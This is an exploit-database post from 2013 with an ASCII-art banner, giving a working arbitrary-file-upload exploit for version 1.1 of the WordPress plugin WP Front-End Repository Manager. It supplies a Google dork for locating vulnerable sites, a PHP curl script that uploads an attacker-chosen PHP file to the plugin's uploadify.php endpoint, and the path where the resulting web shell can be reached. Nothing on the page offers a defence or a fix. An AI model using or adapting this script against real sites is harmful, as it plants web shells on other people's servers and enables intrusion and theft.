Home / exploits WP Front-End Repository Manager Arbitrary File Upload Vulnerability
Posted on 08 November 2013
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____ \__ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm DaOne member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # Exploit Title: WP Front-End Repository Manager Arbitrary File Upload Vulnerability # Author: DaOne aka MockingBird # Vendor Homepage: http://wordpress.org/plugins/wp-front-end-repository/ # Download link: http://downloads.wordpress.org/plugin/wp-front-end-repository.1.1.zip # Version: 1.1 # Category: webapps/php # Google dork: inurl:wp-content/plugins/wp-front-end-repository ------------------------------------------------------------------------ # Exploit <?php $uploadfile="yourfile.php"; $ch = curl_init("http://{target}/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> # Shell path: http://{target}/wp-content/plugins/wp-front-end-repository/js/uploadify/{filename}.php **Peace from Libya**
